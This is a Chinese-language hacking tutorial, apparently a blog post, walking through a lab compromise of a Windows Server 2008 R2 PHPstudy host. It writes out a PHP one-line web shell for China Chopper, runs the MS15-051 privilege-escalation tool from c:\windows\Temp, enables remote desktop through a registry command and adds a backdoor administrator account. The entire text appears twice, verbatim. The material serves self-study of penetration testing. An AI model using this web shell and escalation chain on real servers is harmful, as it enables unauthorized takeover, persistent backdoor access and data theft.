「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。
操作系统: Windows Server 2008 R2 Enterprise
Web环境: PHPstudy( PHP+Apache+MySQL)
第一步,上传一句话木马到Web网站根路径并使用中国菜刀连接
<?php eval($_POST[-7]);?>
第二步,使用中国菜刀查看系统信息,根据系统没安装的补丁进行提权
第三步,使用中国菜刀上传漏洞工具( 此处使用MS15-051漏洞工具)提权
Windows系统的回收站和c:\windows\Temp目录默认具有上传和执行权限,所以我们将漏洞工具上传至c:\windows\Temp目录下
使用中国菜刀打开虚拟终端,查看当前用户权限
C:\phpStudy\PHPTutorial\WWW\> c:\windows\temp\ms15-051x64.exe whoami第四步,开启3389( 远程桌面 )端口
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f使用中国菜刀打开虚拟终端,执行a.bat文件
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "c:\windows\temp\a.bat"查看3389端口是否开启
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "netstat -ano"第五步,添加管理员用户
添加普通用户tom
c:\windows\temp\ms15-051x64.exe "net user tom 123456.qwer /add"将普通用户tom添加至管理员组,拥有管理员权限
c:\windows\temp\ms15-051x64.exe "net localgroup administrators tom /add"第六步,连接远程桌面
物理机开启远程桌面
「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。
操作系统: Windows Server 2008 R2 Enterprise
Web环境: PHPstudy( PHP+Apache+MySQL)
第一步,上传一句话木马到Web网站根路径并使用中国菜刀连接
<?php eval($_POST[-7]);?>
第二步,使用中国菜刀查看系统信息,根据系统没安装的补丁进行提权
第三步,使用中国菜刀上传漏洞工具( 此处使用MS15-051漏洞工具)提权
Windows系统的回收站和c:\windows\Temp目录默认具有上传和执行权限,所以我们将漏洞工具上传至c:\windows\Temp目录下
使用中国菜刀打开虚拟终端,查看当前用户权限
C:\phpStudy\PHPTutorial\WWW\> c:\windows\temp\ms15-051x64.exe whoami第四步,开启3389( 远程桌面 )端口
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f使用中国菜刀打开虚拟终端,执行a.bat文件
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "c:\windows\temp\a.bat"查看3389端口是否开启
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "netstat -ano"第五步,添加管理员用户
添加普通用户tom
c:\windows\temp\ms15-051x64.exe "net user tom 123456.qwer /add"将普通用户tom添加至管理员组,拥有管理员权限
c:\windows\temp\ms15-051x64.exe "net localgroup administrators tom /add"第六步,连接远程桌面
物理机开启远程桌面